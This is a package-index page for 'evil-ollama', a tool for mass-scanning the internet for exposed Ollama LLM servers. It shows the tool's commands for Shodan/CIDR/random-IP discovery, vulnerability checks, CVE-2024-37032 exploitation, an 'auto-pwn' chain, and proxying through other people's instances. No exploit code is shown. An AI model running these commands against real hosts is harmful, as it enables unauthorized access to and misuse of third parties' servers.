Skip to main content

Evil-Ollama Icon

๐Ÿฆ™ EVIL-OLLAMA

Next-Gen Exposed Ollama Instance Finder, Vulnerability Scanner & Proxy Tool

Find publicly exposed Ollama LLM instances across the internet, scan for vulnerabilities, proxy through them, and more.

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  [+] TARGET:      Any exposed Ollama instance                          โ•‘
โ•‘  [+] METHOD:      Async TCP ยท DNS ยท CT Logs ยท Shodan ยท Censys ยท FOFA  โ•‘
โ•‘  [+] VULN SCAN:   Auth ยท CVE-2024-37032 ยท SSRF ยท CORS ยท Metrics       โ•‘
โ•‘  [+] PROXY:       OpenAI-compatible ยท Chat ยท Generate                  โ•‘
โ•‘  [+] STATUS:      ACTIVE                                               โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

๐Ÿ”ฅ FEATURES

Category Features
๐Ÿ” SCANNING Random IP (weighted) ยท CIDR ยท IP List ยท DNS Discovery ยท CT Logs ยท Shodan ยท Censys ยท FOFA ยท 9 methods total
๐Ÿ’€ VULNERABILITY Auth check ยท CVE-2024-37032 (RCE) ยท Model Create/Delete ยท CORS ยท SSRF ยท Metrics ยท Info Disclosure ยท Timing ยท 10 checks
๐Ÿ”Œ PROXY OpenAI SDK compatible ยท Streaming ยท Full API forward ยท All HTTP methods
๐Ÿ’ฌ CHAT Interactive ยท Batch mode ยท System prompts ยท Temperature ยท Raw API
๐Ÿ”Ž FINGERPRINT 18 endpoints ยท GPU detection ยท Model analysis ยท Size calc ยท Running models
๐Ÿ“ฆ MODELS List ยท Pull info ยท Deep analyze ยท Size breakdown
๐Ÿ“Š EXPORT HTML (beautiful) ยท CSV ยท JSON ยท Vuln stats ยท Geo distribution
๐Ÿค– AUTO-PWN Scan โ†’ Vuln Scan โ†’ Geolocate โ†’ Proxy โ†’ Report โ€” one command
๐Ÿ“ก MONITOR CLI-only daemon ยท Telegram alerts ยท Auto-export

โšก QUICK START

๐Ÿ›  Installation

git clone https://github.com/evogix/Evil-Ollama
cd Evil-Ollama
pip install aiohttp flask requests
chmod +x launcher.sh

๐ŸŽฏ Basic Scan

# Scan 10,000 random IPs for Ollama instances
./launcher.sh scan --random 10000

# Scan with geolocation + export
./launcher.sh scan --random 10000 --geo --export html --notify

๐Ÿ’€ COMMANDS

๐Ÿ” SCANNING

# Random IP scan (weighted for real-world density)
./launcher.sh scan --random 10000

# CIDR range scan
./launcher.sh scan --cidr 0.0.0.0/8

# DNS discovery โ€” find ollama.example.com, ai.example.com, etc.
./launcher.sh scan --dns example.com

# Certificate Transparency log discovery
./launcher.sh scan --ct example.com

# Internet DB search
./launcher.sh scan --shodan API_KEY
./launcher.sh scan --censys ID:SECRET
./launcher.sh scan --fofa EMAIL:KEY

# Scan with extras
./launcher.sh scan --random 5000 --geo --export html --notify

๐Ÿ’€ VULNERABILITY SCANNING

# Scan a specific instance
./launcher.sh vuln --target 1.2.3.4:11434

# Scan ALL found instances
./launcher.sh vuln --all

# Exploit a specific CVE
./launcher.sh exploit --cve CVE-2024-37032 --target 1.2.3.4:11434

Vulnerability checks:

  ๐Ÿ’€ [CRITICAL] CVE-2024-37032 โ€” RCE via Crafted Model Import
  ๐Ÿ’€ [HIGH    ] No Authentication โ€” Open API access
  ๐Ÿ’€ [HIGH    ] Unauthenticated Model Creation
  ๐Ÿ’€ [HIGH    ] Unauthenticated Model Deletion
  ๐Ÿ’€ [HIGH    ] CVE-2024-39721 โ€” SSRF in Model Pulling
  ๐Ÿ’€ [MEDIUM  ] CORS Misconfiguration
  ๐Ÿ’€ [MEDIUM  ] Prometheus Metrics Exposed
  ๐Ÿ’€ [LOW     ] Server Information Disclosure
  ๐Ÿ’€ [LOW     ] No CSRF Protection
  ๐Ÿ’€ [LOW     ] Response Timing Leak

๐Ÿ”Œ PROXY (OpenAI Compatible)

# Start proxy to remote Ollama
./launcher.sh proxy --target 1.2.3.4:11434 --port 8080

# Use with OpenAI SDK:
# from openai import OpenAI
# client = OpenAI(base_url="http://127.0.0.1:8080/v1/", api_key="ollama")

๐Ÿ’ฌ INTERACTIVE CHAT

# Chat with a remote model
./launcher.sh chat --target 1.2.3.4:11434

# Batch execute prompts from file
./launcher.sh chat --batch prompts.txt --target 1.2.3.4:11434

# Chat commands: /help, /models, /clear, /model N, /system, /temp, /raw, /info, /export

๐Ÿ”Ž DEEP FINGERPRINT

# Fingerprint a single instance
./launcher.sh fingerprint --target 1.2.3.4:11434

# Fingerprint ALL found instances
./launcher.sh fingerprint --all

Checks 18 endpoints including: /api/tags, /api/version, /api/ps, /api/show, /api/blobs, /api/pull, /api/push, /api/create, /api/delete, /api/copy, /api/embed, /v1/models, /docs, /metrics, /debug, /health, /status

๐Ÿ“ฆ MODEL OPERATIONS

# List models with details
./launcher.sh models --target 1.2.3.4:11434

# Pull model info/config
./launcher.sh models --pull 1.2.3.4:11434 llama3.2

# Deep analyze a model
./launcher.sh models --analyze 1.2.3.4:11434 llama3.2

๐Ÿ“Š EXPORT

./launcher.sh export --format html    # Beautiful HTML report with geo & vuln stats
./launcher.sh export --format csv     # CSV for analysis
./launcher.sh export --format json    # Raw JSON
./launcher.sh export --format all     # All formats

๐Ÿค– AUTO-PWN (One Command)

# Scan โ†’ Vuln Scan โ†’ Geolocate โ†’ Proxy โ†’ Report
./launcher.sh autopwn --random 5000

๐Ÿ“ก MONITOR DAEMON

# Continuous scanning (CLI only, no web)
./launcher.sh monitor --interval 3600 --random 5000 --notify --export html

โš™๏ธ CONFIGURATION

evilollama config --show                               # Show config
evilollama config --telegram-token "BOT_TOKEN"          # Telegram alerts
evilollama config --telegram-chat "CHAT_ID"
evilollama config --find-chat-id                        # Auto-detect chat ID
evilollama config --shodan-key "API_KEY"
evilollama config --set scan_timeout 3                  # Custom setting

๐Ÿ“Š SAMPLE OUTPUT

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘                    ๐Ÿฆ™ EVIL-OLLAMA v3.0                          โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[12:30:01] [โ–ถ STEP ] Step 1/4: Scanning 5000 random IPs...
[12:30:01] [๐ŸŽฏ INFO] Scanning 5000 hosts on port 11434 (concurrency: 1000)
[โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘โ–‘] 45% | 2250/5000 | 850/s | Found: 12 | ETA: 3.2s
[12:30:07] [๐Ÿฆ™ FOUND] 203.0.113.42:11434 | v0.1.32 | llama3.2, mistral, codellama
[12:30:07] [๐Ÿฆ™ FOUND] 198.51.100.73:11434 | v0.3.0 | llama3.1, nomic-embed-text
[...]

[12:30:10] [โ–ถ STEP ] Step 2/4: Geolocating...
[12:30:10] [๐Ÿ“ GEO ] 203.0.113.42 โ†’ San Francisco, US | DigitalOcean
[12:30:11] [๐Ÿ“ GEO ] 198.51.100.73 โ†’ London, UK | Hetzner

[12:30:11] [โ–ถ STEP ] Step 3/4: Vulnerability scanning...
[12:30:11] [๐Ÿ”ด VULN] 203.0.113.42:11434
  ๐Ÿ’€ [HIGH    ] No Authentication Required
  ๐Ÿ’€ [CRITICAL] Potential RCE via Crafted Model Import (CVE-2024-37032)
  ๐Ÿ’€ [HIGH    ] Unauthenticated Model Creation

[12:30:14] [โ–ถ STEP ] Step 4/4: Generating report...
[12:30:14] [๐Ÿ“„ OK   ] HTML report saved: evilollama_report.html (45.2 KB)

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  ๐Ÿš€ AUTO-PWN COMPLETE                                           โ•‘
โ•‘  Instances found:     7                                         โ•‘
โ•‘  Total models:        23                                        โ•‘
โ•‘  Vulnerabilities:     12                                        โ•‘
โ•‘  CVEs detected:       5                                         โ•‘
โ•‘  Report:              evilollama_report.html                          โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[12:30:15] [๐Ÿ”Œ PROXY] Proxy โ†’ 127.0.0.1:9090 โ†’ 203.0.113.42:11434

๐Ÿ›ก๏ธ CVE DATABASE

CVE ID Severity CVSS Description Affected Versions
CVE-2024-37032 CRITICAL 9.1 RCE via crafted model file (path traversal) < 0.1.47
CVE-2024-39720 HIGH 7.5 Prompt injection via crafted system prompt < 0.1.34
CVE-2024-39721 HIGH 7.5 SSRF in model pulling mechanism < 0.1.34
CVE-2024-39722 HIGH 7.3 Path traversal in API endpoints < 0.1.34
CVE-2025-23104 HIGH 8.2 API authentication bypass in /api/pull < 0.3.0

๐Ÿ“‹ REQUIREMENTS

pip install aiohttp flask requests

โš ๏ธ LEGAL DISCLAIMER

For authorized security testing only. Use only on systems you own or have explicit written permission to test. Unauthorized scanning or exploitation is ILLEGAL.

Author: @faizalx1337 ยท No liability for misuse.


EVIL-OLLAMA v3.0 โ€” github.com/evogix/Evil-Ollama ยท For authorized security research & bug bounty purposes only

Metadata

Release files for evil-ollama 3.3.0

For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.

Source distribution (sdist)

Source distribution for evil-ollama 3.3.0
File Size Uploaded
evil_ollama-3.3.0.tar.gz 47.4 kB Details

Built distribution (wheel)

Table of built distributions (wheels) for evil-ollama 3.3.0
File Interpreter ABI Platform
evil_ollama-3.3.0-py3-none-any.whl Python 3 none any Details

Total release size: 94.9 kB

Release files / evil_ollama-3.3.0.tar.gz

Download URL evil_ollama-3.3.0.tar.gz
Size 47.4 kB
Tags Source
SHA-256 checksum
How to use checksums
de67d64684cb5093f206a7bad0d1479f1b7a0dacccdb1776ff539950a7436d52
BLAKE2b-256 checksum
How to use checksums
cb8b6ad2d2195e1e0060e77e5bb4e9a8d92bafa3ad6abfb9dc674b3f9cba67cf
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No
Uploaded via twine/5.1.1 CPython/3.14.6

Release files / evil_ollama-3.3.0-py3-none-any.whl

Download URL evil_ollama-3.3.0-py3-none-any.whl
Size 47.5 kB
Tags Python 3
SHA-256 checksum
How to use checksums
39cda420ca307bf6fc8876cafa93a282a17cade394e1a7e3b4853002894546c3
BLAKE2b-256 checksum
How to use checksums
fd9cb4b5f53e73a3fa85a98355677d9906a195a2c91b06362607e17603c2b0b0
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
No
Uploaded via twine/5.1.1 CPython/3.14.6

Release history Release notifications | RSS feed

This release

3.3.0 This release

2 release files

3.2.9

2 release files

3.2.8

2 release files

3.2.7

2 release files

3.2.6

2 release files

3.2.5

2 release files

3.2.4

2 release files

3.2.3

2 release files

3.2.2

2 release files

3.2.1

2 release files

3.2.0

2 release files

3.1.5

2 release files

3.1.4

2 release files

3.1.3

2 release files

3.1.2

2 release files

3.1.1

2 release files

3.1.0

2 release files

3.0.0

2 release files

Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page